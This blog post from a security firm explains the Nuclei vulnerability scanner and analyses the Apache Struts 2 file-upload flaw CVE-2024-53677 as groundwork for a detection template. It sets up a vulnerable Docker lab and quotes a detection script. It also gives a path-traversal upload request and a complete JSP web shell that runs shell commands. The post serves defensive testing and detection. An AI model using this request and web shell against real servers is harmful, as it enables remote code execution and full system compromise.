top of page
Writer's pictureLoïc Castel

Nuclei Template Creation - a practical example with Struts 2 CVE-2024-53677

In this Safercy blog article, we aim to document both the open-source software Nuclei and the creation of specific “templates,” along with a practical case study of a vulnerability in Apache Struts 2 (a free framework for developing Java EE web applications): CVE-2024-53677.


This article is divided into two parts:

  • The first part (this article) covers an introduction to Nuclei and its template system, as well as a detailed analysis of CVE-2024-53677.

  • The second part will cover creating a template for discovering and confirming the aforementioned vulnerability.


Let’s begin by introducing the Nuclei vulnerability scanning solution.


What is Nuclei?

Nuclei is a fast, customizable vulnerability scanner widely used in the cybersecurity domain. It automates vulnerability detection using user-defined templates.


Thanks to its flexibility, Nuclei can scan various protocols such as HTTP, DNS, and TCP, detecting specific vulnerabilities or misconfigurations.


Nuclei is an open-source project available on GitHub and primarily developed in Golang.


Integration into SaferScan

At Safercy, we’ve integrated Nuclei into our managed scanning solution, Saferscan.

This integration allows us to provide clients with rapid and precise vulnerability detection while leveraging the community templates and creating custom templates tailored to specific needs.


How to Install Nuclei


Follow these steps to install Nuclei:

  • Prerequisites: Ensure Go is installed on your system.

  • Installation:

  • Vérification : Confirm the installation:

nuclei -version
  • Mise à jour des templates : Download official templates:

nuclei -update-templates

For more details, visit the official Nuclei documentation.

Nuclei usage screenshot

Nuclei is also available as a SaaS at https://cloud.projectdiscovery.io/sign-up.

Video extract from ProjectDiscovery (https://www.youtube.com/watch?v=rw26bRrg4-U&t=1s)

We recommend running it in a dedicated container or virtual machine to facilitate maintenance and preserve the environment’s state.


Nuclei Templates

What is a Nuclei Template?

A Nuclei template is a YAML file that defines a specific test for a vulnerability or configuration. It describes the requests to send, conditions to verify, and actions based on responses.


Why Create a Template?

Custom templates enable detection of vulnerabilities specific to your environment or newly discovered flaws not yet covered by official templates, enhancing security by targeting relevant risks.


Where Do Templates Go?

Templates can be shared with the community by submitting a pull request to the official Nuclei template repository.

Template editor

One can simply create or edit a template via this website :



Case Study: Struts 2 Vulnerability (CVE-2024-53677)

Understanding the vulnerability

CVE-2024-53677 affects Apache Struts 2, enabling attackers to exploit file upload parameters for directory traversal, potentially leading to remote code execution.


Affected Versions

  • Struts 2.0.0 à 2.3.37 (end of life)

  • Struts 2.5.0 à 2.5.33

  • Struts 6.0.0 à 6.3.0.2


Impact

  • Arbitrary file uploads

  • Remote code execution

  • Full system compromise


Exploitability

Actively exploited in the wild, with public exploit code available.


Mitigation

Upgrade

Upgrade to Apache Struts 6.4.0 or later.


Mitigations

  • Disable unnecessary file upload functionalities.

  • Implement strict file type controls.

  • Monitor logs for suspicious activity.


Detailed Analysis of CVE-2024-53677

Before creating a Nuclei template to verify the existence of this vulnerability, which we will detail in the second part of this article, we will first analyze the vulnerability in depth to reproduce it.

To actively test the vulnerability, we can adapt the existing PoC into a Nuclei template.


Creating a Vulnerable Environment


To reproduce and test this vulnerability, a vulnerable environment must be set up. The simplest method is to use a Docker container configured to simulate a vulnerable Apache Struts application.


A GitHub repository has been identified: https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker. Although designed for CVE-2023-50164, this container is similar and can be adapted for CVE-2024-53677.


Using an Existing Docker Image


We identified a GitHub repository where the previous code has been updated in a format suitable for our tests: https://github.com/c4oocO/CVE-2024-53677-Docker.


Download and Run the Container

git clone <https://github.com/c4oocO/CVE-2024-53677-Docker>
cd CVE-2024-53677-Docker 
docker build --ulimit nofile=122880:122880 -m 3G -t CVE-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name CVE-2024-53677 CVE-2024-53677
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name CVE-2024-53677 CVE-2024-53677

Environment Validation :

  • Verify you can access the upload application via :


Proof of Concept Analysis

The PoC for the CVE-2024-53677 vulnerability demonstrates exploitation through the manipulation of file upload parameters. The goal is to perform a directory traversal, enabling the attacker to write a malicious file to a specific location outside the directory initially intended for storing uploaded files.


Key Points of the PoC:

Structured POST Request: The POST request used in the PoC includes well-defined headers and targeted parameters to exploit the file upload mechanism.

Key Parameter Manipulation: The top.uploadFileName parameter is manipulated to attempt a directory traversal and overwrite an existing file.

Test File Content: The uploaded file contains harmless content to test if the file is successfully written.


Steps to Exploit:

1. Scan the Target: Identify a valid endpoint for file upload (e.g., upload.action in the example).

2. Send a Test File: Use a POST request to send a test file and verify if the file is written and accessible.


Below is an excerpt from the PoC:

files = {
"upload": ("test.txt", harmless_content, "text/plain"),
"top.uploadFileName": test_filename  # Tentative d'écrasement de fichier
}

The Python script then executes the request and checks if the file is accessible, thereby indicating the vulnerability.


Once the vulnerable environment is set up, execute the PoC to validate the vulnerability. Here are the key steps:


Execution Command:

Use the existing PoC script to send a test file to the configured endpoint.


Example:

$ python Check-CVE-2024-53677.py -u <http://localhost:8080/upload.action> --upload_endpoint /upload.action

Expected Result:

  • An HTTP 200 response indicating that the file was successfully uploaded.

  • A warning if the file is written to an unauthorized location, confirming the vulnerability.


Example of a log generated by the PoC:

$ python Check-CVE-2024-53677.py -u <http://cve-2024-53677.orb.local/upload.action> --upload_endpoint /upload.action

2024-12-30 16:04:07,865 [INFO] Starting detection process...
2024-12-30 16:04:07,865 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2024-12-30 16:04:07,865 [INFO] Sending test request to upload endpoint: <http://cve-2024-53677.orb.local/upload.action>
2024-12-30 16:04:07,902 [INFO] [INFO] File upload request succeeded.
2024-12-30 16:04:07,902 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2024-12-30 16:04:07,902 [INFO] Detection process completed.

Reproducing and Exploiting the Vulnerability

To reproduce the vulnerability and test its impact manually, follow these steps (in our examples, we used PortSwigger’s Burp Suite proxy):


Preparing the POST Request:

Configure a POST request with the required parameters and request body.


Example headers:

POST /upload.action HTTP/1.1
[..]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary982jlh8wv0ld4s2b
Content-Length: 338

------WebKitFormBoundary982jlh8wv0ld4s2b
Content-Disposition: form-data; name="Upload"; filename="shell.jsp"
Content-Type: text/plain

S2-067 detection test.
------WebKitFormBoundary982jlh8wv0ld4s2b
Content-Disposition: form-data; name="top.uploadFileName"

../../../../shell.jsp

Sent file content :

Create a malicious file with JSP code to enable command execution, replacing the placeholder S2-067 detection test. with the following content:

<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p;
        try {
            p = Runtime.getRuntime().exec(cmd);
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            InputStreamReader isr = new InputStreamReader(in);
            BufferedReader br = new BufferedReader(isr);
            String line;
            while ((line = br.readLine()) != null) {
                out.println(line + "<br>");
            }
        } catch (Exception e) {
            out.println("Error: " + e.getMessage());
        }
    } else {
        out.println("No command provided. Use '?cmd=<command>' to execute a command.");
    }
%>

This results in the following request and response:

Utilisation de Burp suite pour exploiter la faille manuellement

Validation of the Uploaded File:

Verify if the file has been written and is accessible via a public URL. Example test:


Exploitation Success :

The vulnerability is confirmed if you see the content of the folder being displayed (using the ls command on Linux systems).


By following these steps, you will gain a comprehensive understanding of the CVE-2024-53677 vulnerability and be equipped to create tailored tools for its detection and remediation, allowing to go to the next phase : building a Nuclei Template to detect CVE-2024-53677 .


Conclusion


The development of a Nuclei scanner component for CVE-2024-53677 highlights the importance of having customized and efficient detection tools. This approach enables organizations to quickly identify critical vulnerabilities and take necessary actions to secure their systems.


In the second part of this article, we will delve into the technical process of creating the Nuclei template, using this Struts 2 vulnerability as an example.



2 views0 comments

Recent Posts

See All

Comments


bottom of page